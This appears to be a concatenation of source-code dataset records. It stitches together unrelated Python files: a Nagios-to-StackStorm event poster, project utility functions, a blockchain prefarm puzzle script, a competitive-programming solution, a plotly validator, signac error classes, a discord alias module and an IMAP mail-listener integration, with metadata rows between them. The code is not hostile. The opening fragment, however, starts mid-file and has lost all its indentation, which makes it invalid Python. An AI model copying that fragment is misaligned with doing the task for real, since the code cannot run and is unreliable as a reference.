if len(body) == 0:
_create_trigger_type()
except:
raise
else:
REGISTERED_WITH_ST2 = True
def _get_st2_triggers_url():
url = urljoin(ST2_API_BASE_URL, ST2_TRIGGERS_PATH)
return url
def _get_st2_webhooks_url():
url = urljoin(ST2_API_BASE_URL, ST2_WEBHOOKS_PATH)
return url
def _post_event_to_st2(url, body):
headers = {}
headers['X-ST2-Integration'] = 'nagios.'
headers['Content-Type'] = 'application/json; charset=utf-8'
if ST2_AUTH_TOKEN:
headers['X-Auth-Token'] = ST2_AUTH_TOKEN
try:
# sys.stdout.write('POST: url: %s, body: %s\n' % (url, body))
r = requests.post(url, data=json.dumps(body), headers=headers)
except:
sys.stderr.write('Cannot connect to st2 endpoint.')
else:
status = r.status_code
if status not in OK_CODES:
sys.stderr.write('Failed posting nagios event to st2. HTTP_CODE: %d\n' % status)
else:
sys.stdout.write('Sent nagios event to st2. HTTP_CODE: %d\n' % status)
def _get_payload(host, service, event_id, state, state_type, attempt):
payload = {}
payload['host'] = host
payload['service'] = service
payload['event_id'] = event_id
payload['state'] = state
payload['state_type'] = state_type
payload['attempt'] = attempt
payload['msg'] = STATE_MESSAGE.get(state, 'Undefined state.')
return payload
def main(args):
event_id = args[1]
service = args[2]
state = args[3]
state_type = args[4]
attempt = args[5]
host = args[6]
payload = _get_payload(host, service, event_id, state, state_type, attempt)
body = {}
body['trigger'] = ST2_TRIGGERTYPE_REF
body['payload'] = payload
_post_event_to_st2(_get_st2_webhooks_url(), body)
if __name__ == '__main__':
try:
if not os.path.exists(ST2_CONFIG_FILE):
sys.stderr.write('Configuration file not found. Exiting.\n')
sys.exit(1)
with open(ST2_CONFIG_FILE) as f:
config = yaml.safe_load(f)
ST2_USERNAME = config['st2_username']
ST2_PASSWORD = config['st2_password']
ST2_API_BASE_URL = config['st2_api_base_url']
ST2_AUTH_BASE_URL = config['st2_auth_base_url']
if not REGISTERED_WITH_ST2:
_register_with_st2()
except:
sys.stderr.write('Failed registering with st2. Won\'t post event.\n')
else:
main(sys.argv)
| 28.789744
| 92
| 0.636979
|
6c2262b4d65f8083f8456ce5ce012cb0dbd5f791
| 5,656
|
py
|
Python
|
backstage/core/funcs.py
|
pyrustic/backstage
|
d0cead248235026129e3743d43c12691342701fc
|
[
"MIT"
] | null | null | null |
backstage/core/funcs.py
|
pyrustic/backstage
|
d0cead248235026129e3743d43c12691342701fc
|
[
"MIT"
] | null | null | null |
backstage/core/funcs.py
|
pyrustic/backstage
|
d0cead248235026129e3743d43c12691342701fc
|
[
"MIT"
] | null | null | null |
import os
import os.path
import shutil
def get_app_pkg(project_dir):
"""
This function extracts the application package name from a project_dir path.
Basically it extracts the basename from the path then turns dashes "-" into
"underscores" "_".
Parameters:
- project_dir: str, path to the project_dir project
Returns: str, the application package name.
"""
if not project_dir:
return None
basename = os.path.basename(project_dir)
cache = basename.split("-")
app_pkg = "_".join(cache)
return app_pkg
def get_project_name(project_dir):
"""Returns the project name"""
return os.path.basename(project_dir)
def ask_for_confirmation(message, default="y"):
"""
Use this function to request a confirmation from the user.
Parameters:
- message: str, the message to display
- default: str, either "y" or "n" to tell "Yes by default"
or "No, by default".
Returns: a boolean, True or False to reply to the request.
Note: this function will append a " (y/N): " or " (Y/n): " to the message.
"""
cache = "Y/n" if default == "y" else "y/N"
user_input = None
try:
user_input = input("{} ({}): ".format(message, cache))
except EOFError as e:
pass
if not user_input:
user_input = default
if user_input.lower() == "y":
return True
return False
def wheels_assets(target):
dist_folder = os.path.join(target,
"dist")
if not os.path.exists(dist_folder):
return []
assets = []
for item in os.listdir(dist_folder):
_, ext = os.path.splitext(item)
if ext != ".whl":
continue
path = os.path.join(dist_folder, item)
if not os.path.isfile(path):
continue
assets.append(item)
assets = _sort_wheels_names(assets)
assets.reverse()
return assets
def copyto(src, dest):
"""
Please make sure that DEST doesn't exist yet !
Copy a file or contents of directory (src) to a destination file or folder (dest)
"""
if not os.path.exists(src) or os.path.exists(dest):
return False
if os.path.isdir(src):
try:
shutil.copytree(src, dest)
except Exception as e:
return False
else:
try:
shutil.copy2(src, dest)
except Exception as e:
return False
return True
def moveto(src, dest):
"""
If the DEST exists:
* Before moveto *
- /home/lake (SRC)
- /home/lake/fish.txt
- /home/ocean (DEST)
* Moveto *
moveto("/home/lake", "/home/ocean")
* After Moveto *
- /home/ocean
- /home/ocean/lake
- /home/ocean/lake/fish.txt
Else IF the DEST doesn't exist:
* Before moveto *
- /home/lake (SRC)
- /home/lake/fish.txt
* Moveto *
moveto("/home/lake", "/home/ocean")
* After Moveto *
- /home/ocean
- /home/ocean/fish.txt
Move a file or directory (src) to a destination folder (dest)
"""
if not os.path.exists(src) or os.path.exists(dest):
return False
try:
shutil.move(src, dest)
except Exception as e:
return False
return True
def package_name_to_path(target, package_name, prefix=""):
# returns a dotted package name to a regular pathname
# example: package_name_to_path("/home/proj", "view.lol", prefix="tests.")
return os.path.join(target, *((prefix + package_name).split(".")))
def build_package(target, package_name, prefix=""):
"""
Literally build a package, returns None or the string pathname
package represented by prefix must already exist
"""
splitted = package_name.split(".")
dir = package_name_to_path(target, prefix) if prefix else target
for item in splitted:
dir = os.path.join(dir, item)
if not os.path.exists(dir):
try:
os.mkdir(dir)
except Exception as e:
pass
init_file = os.path.join(dir, "__init__.py")
if not os.path.exists(init_file):
try:
with open(init_file, "w") as file:
pass
except Exception as e:
pass
if not os.path.isdir(dir):
return None
return dir
def module_name_to_class(module_name):
"""
Convert a module name like my_module.py to a class name like MyModule
"""
name = os.path.splitext(module_name)[0]
# ...
if not "_" in name:
return strictly_capitalize(name)
else:
splitted = name.split("_")
cache = []
for x in splitted:
cache.append(strictly_capitalize(x))
return "".join(cache)
def strictly_capitalize(string):
# I don't remember why I haven't used str.capitalize()
return string[0].upper() + string[1:]
def get_root_from_package(package_name):
"""
Return the root from a dotted package name.
Example the root here "my.package.is.great" is "my".
"""
splitted = package_name.split(".")
root = None
for x in splitted:
if x == "" or x.isspace():
continue
root = x
break
return root
def get_hub_url(res):
target = "https://api.github.com"
return "{}{}".format(target, res)
def _sort_wheels_names(data):
cache = list()
for name in data:
version = name.split("-")[1]
cache.append((version, name))
cache.sort(key=lambda s: [int(i) for i in s[0].split('.')])
return [name for version, name in cache]
| 26.805687
| 85
| 0.588048
|
59c1e9a1f818fed5d4fceed3bb333e8496da974e
| 2,210
|
py
|
Python
|
kale/wallet/puzzles/prefarm/make_prefarm_ph.py
|
inan0812/kale-blockchain
|
1b502fe21a4be10b4db0171c3a7030079dcefa1b
|
[
"Apache-2.0"
] | null | null | null |
kale/wallet/puzzles/prefarm/make_prefarm_ph.py
|
inan0812/kale-blockchain
|
1b502fe21a4be10b4db0171c3a7030079dcefa1b
|
[
"Apache-2.0"
] | null | null | null |
kale/wallet/puzzles/prefarm/make_prefarm_ph.py
|
inan0812/kale-blockchain
|
1b502fe21a4be10b4db0171c3a7030079dcefa1b
|
[
"Apache-2.0"
] | null | null | null |
from clvm.casts import int_from_bytes
from clvm_tools import binutils
from kale.consensus.block_rewards import calculate_base_farmer_reward, calculate_pool_reward
from kale.types.blockchain_format.program import Program
from kale.types.condition_opcodes import ConditionOpcode
from kale.util.bech32m import decode_puzzle_hash, encode_puzzle_hash
from kale.util.condition_tools import parse_sexp_to_conditions
from kale.util.ints import uint32
address1 = "txka15gx26ndmacfaqlq8m0yajeggzceu7cvmaz4df0hahkukes695rss6lej7h" # Gene wallet (m/12381/6333/2/42):
address2 = "txka1c2cguswhvmdyz9hr3q6hak2h6p9dw4rz82g4707k2xy2sarv705qcce4pn" # Mariano address (m/12381/6333/2/0)
ph1 = decode_puzzle_hash(address1)
ph2 = decode_puzzle_hash(address2)
pool_amounts = int(calculate_pool_reward(uint32(0)) / 2)
farmer_amounts = int(calculate_base_farmer_reward(uint32(0)) / 2)
assert pool_amounts * 2 == calculate_pool_reward(uint32(0))
assert farmer_amounts * 2 == calculate_base_farmer_reward(uint32(0))
def make_puzzle(amount: int) -> int:
puzzle = f"(q . ((51 0x{ph1.hex()} {amount}) (51 0x{ph2.hex()} {amount})))"
# print(puzzle)
puzzle_prog = Program.to(binutils.assemble(puzzle))
print("Program: ", puzzle_prog)
puzzle_hash = puzzle_prog.get_tree_hash()
solution = "()"
prefix = "xka"
print("PH", puzzle_hash)
print(f"Address: {encode_puzzle_hash(puzzle_hash, prefix)}")
result = puzzle_prog.run(solution)
error, result_human = parse_sexp_to_conditions(result)
total_kale = 0
if error:
print(f"Error: {error}")
else:
assert result_human is not None
for cvp in result_human:
assert len(cvp.vars) == 2
total_kale += int_from_bytes(cvp.vars[1])
print(
f"{ConditionOpcode(cvp.opcode).name}: {encode_puzzle_hash(cvp.vars[0], prefix)},"
f" amount: {int_from_bytes(cvp.vars[1])}"
)
return total_kale
total_kale = 0
print("Pool address: ")
total_kale += make_puzzle(pool_amounts)
print("\nFarmer address: ")
total_kale += make_puzzle(farmer_amounts)
assert total_kale == calculate_base_farmer_reward(uint32(0)) + calculate_pool_reward(uint32(0))
| 35.645161
| 114
| 0.730769
|
6e9cbdf25d0ed5712a32a27da07516d481a1313a
| 497
|
py
|
Python
|
submissions/abc170/c.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 1
|
2021-05-10T01:16:28.000Z
|
2021-05-10T01:16:28.000Z
|
submissions/abc170/c.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 3
|
2021-05-11T06:14:15.000Z
|
2021-06-19T08:18:36.000Z
|
submissions/abc170/c.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | null | null | null |
def main():
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
x, n = map(int, readline().split())
p = list(map(int, readline().split()))
check = float('inf')
ans = 0
for i in range(102):
if i not in p:
if check > abs(x - i):
ans = i
check = abs(x - i)
print(ans)
if __name__ == '__main__':
main()
| 22.590909
| 42
| 0.531187
|
6a4e77b481d87aa0d4c759ae681a0649d2628d5f
| 465
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/font/_sizesrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 76
|
2020-07-06T14:44:05.000Z
|
2022-02-14T15:30:21.000Z
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/font/_sizesrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/cone/hoverlabel/font/_sizesrc.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class SizesrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="sizesrc", parent_name="cone.hoverlabel.font", **kwargs
):
super(SizesrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
| 31
| 81
| 0.636559
|
be34738bb59daabfd90ef0829f8cf3234ffe7527
| 421
|
py
|
Python
|
addifintegers.py
|
manand881/Python-Programs
|
eb970cb1b21d4aede0102c60425eb8a1d4ac605c
|
[
"MIT"
] | null | null | null |
addifintegers.py
|
manand881/Python-Programs
|
eb970cb1b21d4aede0102c60425eb8a1d4ac605c
|
[
"MIT"
] | null | null | null |
addifintegers.py
|
manand881/Python-Programs
|
eb970cb1b21d4aede0102c60425eb8a1d4ac605c
|
[
"MIT"
] | null | null | null |
# Add two objects if both objects are an integer type
import sys
def add_ints(a, b):
if type(a) == type(b) == int:
return a + b
else:
sys.exit
print(add_ints(1,2)) # ===> 3
print(add_ints(1,'2')) # ===> None
# def add_numbers(a, b):
# if not (isinstance(a, int) and isinstance(b, int)):
# raise TypeError("Inputs must be integers")
# return a + b
# print(add_numbers(10, 20))
| 22.157895
| 57
| 0.586698
|
c371aefd75a154c71519efca1ad974c27e00d673
| 956
|
py
|
Python
|
signac/common/errors.py
|
shandave/signac
|
911d7eb1f475f501b2c21e47bbf00829a958147a
|
[
"BSD-3-Clause"
] | null | null | null |
signac/common/errors.py
|
shandave/signac
|
911d7eb1f475f501b2c21e47bbf00829a958147a
|
[
"BSD-3-Clause"
] | 106
|
2020-06-11T19:44:35.000Z
|
2022-03-01T13:01:09.000Z
|
signac/common/errors.py
|
daico007/signac
|
a20d815bd87af3d8992c71871071024062cada07
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017 The Regents of the University of Michigan
# All rights reserved.
# This software is licensed under the BSD 3-Clause License.
"""Errors raised by signac.common classes."""
from ..core.errors import Error
class ConfigError(Error, RuntimeError):
"""Error with parsing or reading a configuration file."""
pass
# this class is only used by deprecated features
class AuthenticationError(Error, RuntimeError):
"""Authentication error."""
def __str__(self):
if len(self.args) > 0:
return "Failed to authenticate with host '{}'.".format(self.args[0])
else:
return "Failed to authenticate with host."
# this class is only used by deprecated features
class ExportError(Error, RuntimeError):
"""Error exporting documents to a mirror."""
pass
# this class is only used by deprecated features
class FetchError(FileNotFoundError):
"""Error in fetching data."""
pass
| 25.837838
| 80
| 0.697699
|
eaa97f8c79bd04025e6c211373e028ba5f3b1146
| 2,471
|
py
|
Python
|
discord/state.py
|
nextcord-ext/nextcord
|
7b3022ae19299e1f40f5f34da33b80ae491aa06a
|
[
"MIT"
] | null | null | null |
discord/state.py
|
nextcord-ext/nextcord
|
7b3022ae19299e1f40f5f34da33b80ae491aa06a
|
[
"MIT"
] | null | null | null |
discord/state.py
|
nextcord-ext/nextcord
|
7b3022ae19299e1f40f5f34da33b80ae491aa06a
|
[
"MIT"
] | null | null | null |
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Copyright (c) 2021-present tag-epic
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
--------------
Aliased moodule. See the same file in the nextcord folder for more information
Autogenerated by aliasgen.py
"""
from nextcord.state import (
AllowedMentions,
Any,
ApplicationFlags,
AutoShardedConnectionState,
BaseActivity,
Callable,
CategoryChannel,
ChannelType,
ChunkRequest,
ClientUser,
ConnectionState,
Coroutine,
DMChannel,
Deque,
Dict,
Emoji,
GroupChannel,
Guild,
GuildSticker,
Intents,
Interaction,
Invite,
List,
Member,
MemberCacheFlags,
Message,
Object,
Optional,
OrderedDict,
PartialEmoji,
PartialMessageable,
RawBulkMessageDeleteEvent,
RawIntegrationDeleteEvent,
RawMessageDeleteEvent,
RawMessageUpdateEvent,
RawReactionActionEvent,
RawReactionClearEmojiEvent,
RawReactionClearEvent,
RawTypingEvent,
Role,
Sequence,
StageChannel,
StageInstance,
Status,
StoreChannel,
TYPE_CHECKING,
TextChannel,
Thread,
ThreadMember,
Tuple,
TypeVar,
Union,
User,
View,
ViewStore,
VoiceChannel,
_channel_factory,
_integration_factory,
_log,
annotations,
asyncio,
copy,
datetime,
deque,
inspect,
itertools,
logging,
logging_coroutine,
os,
try_enum,
utils,
)
| 23.990291
| 78
| 0.717928
|
5cf33cd241e4c8aa395c08940cce8e71799fdd61
| 23,795
|
py
|
Python
|
Packs/MailListener/Integrations/MailListenerV2/MailListenerV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799
|
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/MailListener/Integrations/MailListenerV2/MailListenerV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317
|
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/MailListener/Integrations/MailListenerV2/MailListenerV2.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297
|
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import ssl
from datetime import timezone
from typing import Any, Dict, Tuple, List, Optional
from dateparser import parse
from mailparser import parse_from_bytes
from imap_tools import OR
from imapclient import IMAPClient
import demistomock as demisto
from CommonServerPython import *
class Email(object):
def __init__(self, message_bytes: bytes, include_raw_body: bool, save_file: bool, id_: int) -> None:
"""
Initialize Email class with all relevant data
Args:
id_: The unique ID with which the email can be fetched from the server specifically
message_bytes: The raw email bytes
include_raw_body: Whether to include the raw body of the mail in the incident's body
save_file: Whether to save the .eml file of the incident's mail
"""
self.mail_bytes = message_bytes
try:
email_object = parse_from_bytes(message_bytes)
except UnicodeDecodeError as e:
demisto.info(f'Failed parsing mail from bytes: [{e}]\n{traceback.format_exc()}.'
'\nWill replace backslash and try to parse again')
message_bytes = self.handle_message_slashes(message_bytes)
email_object = parse_from_bytes(message_bytes)
self.id = id_
self.to = [mail_addresses for _, mail_addresses in email_object.to]
self.cc = [mail_addresses for _, mail_addresses in email_object.cc]
self.bcc = [mail_addresses for _, mail_addresses in email_object.bcc]
self.attachments = email_object.attachments
self.from_ = [mail_addresses for _, mail_addresses in email_object.from_][0]
self.format = email_object.message.get_content_type()
self.html = email_object.text_html[0] if email_object.text_html else ''
self.text = email_object.text_plain[0] if email_object.text_plain else ''
self.subject = email_object.subject
self.headers = email_object.headers
self.raw_body = email_object.body if include_raw_body else None
# According to the mailparser documentation the datetime object is in utc
self.date = email_object.date.replace(tzinfo=timezone.utc)
self.raw_json = self.generate_raw_json()
self.save_eml_file = save_file
self.labels = self._generate_labels()
@staticmethod
def handle_message_slashes(message_bytes: bytes) -> bytes:
"""
Handles the case where message bytes containing backslashes which needs escaping
Returns:
The message bytes after escaping
"""
# Input example # 1:
# message_bytes = b'\\U'
# Output example # 1 (added escaping for the slash):
# b'\\\\U'
#
# Input example # 2:
# message_bytes = b'\\\\U'
# Output example # 2 (no need to add escaping since the number of slashes is even):
# b'\\\\U'
regex = re.compile(rb'\\+U', flags=re.IGNORECASE)
def escape_message_bytes(m):
s = m.group(0)
if len(s) % 2 == 0:
# The number of slashes prior to 'u' is odd - need to add one backslash
s = b'\\' + s
return s
message_bytes = regex.sub(escape_message_bytes, message_bytes)
return message_bytes
def _generate_labels(self) -> List[Dict[str, str]]:
"""
Generates the labels needed for the incident
Returns:
A list of dicts with the form {type: <label name>, value: <label-value>}
"""
labels = [{'type': 'Email/headers', 'value': json.dumps(self.headers)},
{'type': 'Email/from', 'value': self.from_},
{'type': 'Email/format', 'value': self.format},
{'type': 'Email/text', 'value': self.text.strip()},
{'type': 'Email/subject', 'value': self.subject},
]
labels.extend([
{'type': f'Email/headers/{header_name}',
'value': header_value} for header_name, header_value in self.headers.items()
])
labels.extend([{'type': 'Email', 'value': mail_to} for mail_to in self.to])
labels.extend([{'type': 'Email/cc', 'value': cc_mail} for cc_mail in self.cc])
labels.extend([{'type': 'Email/bcc', 'value': bcc_mail} for bcc_mail in self.bcc])
if self.html:
labels.append({'type': 'Email/html', 'value': self.html.strip()})
if self.attachments:
labels.append({'type': 'Email/attachments',
'value': ','.join([attachment['filename'] for attachment in self.attachments])})
return labels
def parse_attachments(self) -> list:
"""
Writes the attachments of the files and returns a list of file entry details.
If self.save_eml_file is set, will also save the email itself as file
Returns:
A list of the written files entries
"""
files = []
for attachment in self.attachments:
payload = attachment.get('payload')
file_data = base64.b64decode(payload) if attachment.get('binary') else payload
# save the attachment
file_result = fileResult(attachment.get('filename'), file_data, attachment.get('mail_content_type'))
# check for error
if file_result['Type'] == entryTypes['error']:
demisto.error(file_result['Contents'])
files.append({
'path': file_result['FileID'],
'name': file_result['File']
})
if self.save_eml_file:
file_result = fileResult('original-email-file.eml', self.mail_bytes)
files.append({
'path': file_result['FileID'],
'name': file_result['File']
})
return files
def convert_to_incident(self) -> Dict[str, Any]:
"""
Convert an Email class instance to a demisto incident
Returns:
A dict with all relevant fields for an incident
"""
return {
'labels': self._generate_labels(),
'occurred': self.date.isoformat(),
'created': datetime.now(timezone.utc).isoformat(),
'details': self.text or self.html,
'name': self.subject,
'attachment': self.parse_attachments(),
'rawJSON': json.dumps(self.raw_json)
}
def generate_raw_json(self, parse_attachments: bool = False) -> dict:
"""
Args:
parse_attachments: whether to parse the attachments and write them to files
during the execution of this method or not.
"""
raw_json = {
'to': ','.join(self.to),
'cc': ','.join(self.cc),
'bcc': ','.join(self.bcc),
'from': self.from_,
'format': self.format,
'text': self.text,
'subject': self.subject,
'attachments': self.parse_attachments() if parse_attachments else ','.join(
[attachment['filename'] for attachment in self.attachments]),
'rawHeaders': self.parse_raw_headers(),
'headers': remove_empty_elements(self.headers)
}
if self.html:
raw_json['HTML'] = self.html
if self.raw_body:
raw_json['rawBody'] = self.raw_body
return raw_json
def parse_raw_headers(self) -> str:
"""
Parses the dict with the mail headers into a string representation
Returns:
A string representation of the headers with the form <key>: <value>\n for al keys and values in the headers dict
"""
headers_string_lines = [f'{key}: {value}' for key, value in self.headers.items()]
return '\n'.join(headers_string_lines)
def fetch_incidents(client: IMAPClient,
last_run: dict,
first_fetch_time: str,
include_raw_body: bool,
with_headers: bool,
permitted_from_addresses: str,
permitted_from_domains: str,
delete_processed: bool,
limit: int,
save_file: bool
) -> Tuple[dict, list]:
"""
This function will execute each interval (default is 1 minute).
The search is based on the criteria of the SINCE time and the UID.
We will always store the latest email message UID that came up in the search, even if it will not be ingested as
incident (can happen in the first fetch where the email messages that were returned from the search are before the
value that was set in the first fetch parameter).
This is required because the SINCE criterion disregards the time and timezone (i.e. considers only the date),
so it might be that in the first fetch we will fetch only email messages that are occurred before the first fetch
time (could also happen that the limit parameter, which is implemented in the code and cannot be passed as a
criterion to the search, causes us to keep retrieving the same email messages in the search result)
The SINCE criterion will be sent only for the first fetch, and then the fetch will be by UID
We will continue using the first fetch time as it may take more than one fetch interval to get to the mail that
was actually received after the first fetch time
Args:
client: IMAP client
last_run: The greatest incident created_time we fetched from last fetch
first_fetch_time: If last_run is None then fetch all incidents since first_fetch_time
include_raw_body: Whether to include the raw body of the mail in the incident's body
with_headers: Whether to add headers to the search query
permitted_from_addresses: A string representation of list of mail addresses to fetch from
permitted_from_domains: A string representation list of domains to fetch from
delete_processed: Whether to delete processed mails
limit: The maximum number of incidents to fetch each time
save_file: Whether to save the .eml file of the incident's mail
Returns:
next_run: This will be last_run in the next fetch-incidents
incidents: Incidents that will be created in Demisto
"""
uid_to_fetch_from = last_run.get('last_uid', 1)
time_to_fetch_from = parse(last_run.get('last_fetch', f'{first_fetch_time} UTC'), settings={'TIMEZONE': 'UTC'})
mails_fetched, messages, uid_to_fetch_from = fetch_mails(
client=client,
include_raw_body=include_raw_body,
time_to_fetch_from=time_to_fetch_from,
limit=limit,
with_headers=with_headers,
permitted_from_addresses=permitted_from_addresses,
permitted_from_domains=permitted_from_domains,
save_file=save_file,
uid_to_fetch_from=uid_to_fetch_from
)
incidents = []
for mail in mails_fetched:
incidents.append(mail.convert_to_incident())
uid_to_fetch_from = max(uid_to_fetch_from, mail.id)
next_run = {'last_uid': uid_to_fetch_from}
if delete_processed:
client.delete_messages(messages)
return next_run, incidents
def fetch_mails(client: IMAPClient,
time_to_fetch_from: datetime = None,
with_headers: bool = False,
permitted_from_addresses: str = '',
permitted_from_domains: str = '',
include_raw_body: bool = False,
limit: int = 200,
save_file: bool = False,
message_id: int = None,
uid_to_fetch_from: int = 1) -> Tuple[list, list, int]:
"""
This function will fetch the mails from the IMAP server.
Args:
client: IMAP client
time_to_fetch_from: Fetch all incidents since first_fetch_time
include_raw_body: Whether to include the raw body of the mail in the incident's body
with_headers: Whether to add headers to the search query
permitted_from_addresses: A string representation of list of mail addresses to fetch from
permitted_from_domains: A string representation list of domains to fetch from
limit: The maximum number of incidents to fetch each time, if the value is -1 all
mails will be fetched (used with list-messages command)
save_file: Whether to save the .eml file of the incident's mail
message_id: A unique message ID with which a specific mail can be fetched
uid_to_fetch_from: The email message UID to start the fetch from as offset
Returns:
mails_fetched: A list of Email objects
messages_fetched: A list of the ids of the messages fetched
last_message_in_current_batch: The UID of the last message fetchedd
"""
if message_id:
messages_uids = [message_id]
else:
messages_query = generate_search_query(time_to_fetch_from,
with_headers,
permitted_from_addresses,
permitted_from_domains,
uid_to_fetch_from)
demisto.debug(f'Searching for email messages with criteria: {messages_query}')
messages_uids = client.search(messages_query)[:limit]
mails_fetched = []
messages_fetched = []
demisto.debug(f'Messages to fetch: {messages_uids}')
for mail_id, message_data in client.fetch(messages_uids, 'RFC822').items():
message_bytes = message_data.get(b'RFC822')
# For cases the message_bytes is returned as a string. If failed, will try to use the message_bytes returned.
try:
message_bytes = bytes(message_bytes)
except Exception as e:
demisto.debug(f"Converting data was un-successful. {mail_id=}, {message_data=}. Error: {e}")
if not message_bytes:
continue
email_message_object = Email(message_bytes, include_raw_body, save_file, mail_id)
if (not time_to_fetch_from or time_to_fetch_from < email_message_object.date) and \
int(email_message_object.id) > int(uid_to_fetch_from):
mails_fetched.append(email_message_object)
messages_fetched.append(email_message_object.id)
else:
demisto.debug(f'Skipping {email_message_object.id} with date {email_message_object.date}. '
f'uid_to_fetch_from: {uid_to_fetch_from}, first_fetch_time: {time_to_fetch_from}')
last_message_in_current_batch = uid_to_fetch_from
if messages_uids:
last_message_in_current_batch = messages_uids[-1]
return mails_fetched, messages_fetched, last_message_in_current_batch
def generate_search_query(time_to_fetch_from: Optional[datetime],
with_headers: bool,
permitted_from_addresses: str,
permitted_from_domains: str,
uid_to_fetch_from: int) -> list:
"""
Generates a search query for the IMAP client 'search' method. with the permitted domains, email addresses and the
starting date from which mail should be fetched.
Input example #1:
time_to_fetch_from: datetime.datetime(2020, 8, 7, 12, 14, 32, 918634, tzinfo=datetime.timezone.utc)
with_headers: True
permitted_from_addresses: ['test1@mail.com']
permitted_from_domains: ['test1.com']
output example #1:
['OR',
'HEADER',
'FROM',
'test1.com',
'HEADER',
'FROM',
'test1@mail.com',
'SINCE',
datetime.datetime(2020, 8, 7, 12, 14, 32, 918634, tzinfo=datetime.timezone.utc)]
Input example #2:
time_to_fetch_from: datetime.datetime(2020, 8, 7, 12, 14, 32, 918634, tzinfo=datetime.timezone.utc)
with_headers: False
permitted_from_addresses: ['test1@mail.com']
permitted_from_domains: ['test1.com']
output example #2:
['OR',
'FROM',
'test1.com',
'FROM',
'test1@mail.com',
'SINCE',
datetime.datetime(2020, 8, 7, 12, 14, 32, 918634, tzinfo=datetime.timezone.utc)]
Args:
time_to_fetch_from: The greatest incident created_time we fetched from last fetch
with_headers: Whether to add headers to the search query
permitted_from_addresses: A string representation of list of mail addresses to fetch from
permitted_from_domains: A string representation list of domains to fetch from
uid_to_fetch_from: The email message UID to start the fetch from as offset
Returns:
A list with arguments for the email search query
"""
permitted_from_addresses_list = argToList(permitted_from_addresses)
permitted_from_domains_list = argToList(permitted_from_domains)
messages_query = ''
if permitted_from_addresses_list + permitted_from_domains_list:
messages_query = OR(from_=permitted_from_addresses_list + permitted_from_domains_list).format()
# Removing Parenthesis and quotes
messages_query = messages_query.strip('()').replace('"', '')
if with_headers:
messages_query = messages_query.replace('FROM', 'HEADER FROM')
# Creating a list of the OR query words
messages_query_list = messages_query.split()
if time_to_fetch_from:
messages_query_list += ['SINCE', time_to_fetch_from] # type: ignore[list-item]
if uid_to_fetch_from:
messages_query_list += ['UID', f'{uid_to_fetch_from}:*']
return messages_query_list
def test_module(client: IMAPClient) -> str:
yesterday = parse('1 day UTC')
client.search(['SINCE', yesterday])
return 'ok'
def list_emails(client: IMAPClient,
first_fetch_time: str,
with_headers: bool,
permitted_from_addresses: str,
permitted_from_domains: str) -> CommandResults:
"""
Lists all emails that can be fetched with the given configuration and return a preview version of them.
Args:
client: IMAP client
first_fetch_time: Fetch all incidents since first_fetch_time
with_headers: Whether to add headers to the search query
permitted_from_addresses: A string representation of list of mail addresses to fetch from
permitted_from_domains: A string representation list of domains to fetch from
Returns:
The Subject, Date, To, From and ID of the fetched mails wrapped in command results object.
"""
fetch_time = parse(f'{first_fetch_time} UTC')
mails_fetched, _, _ = fetch_mails(client=client,
time_to_fetch_from=fetch_time,
with_headers=with_headers,
permitted_from_addresses=permitted_from_addresses,
permitted_from_domains=permitted_from_domains)
results = [{'Subject': email.subject,
'Date': email.date.isoformat(),
'To': email.to,
'From': email.from_,
'ID': email.id} for email in mails_fetched]
return CommandResults(outputs_prefix='MailListener.EmailPreview',
outputs_key_field='ID',
outputs=results)
def get_email(client: IMAPClient, message_id: int) -> CommandResults:
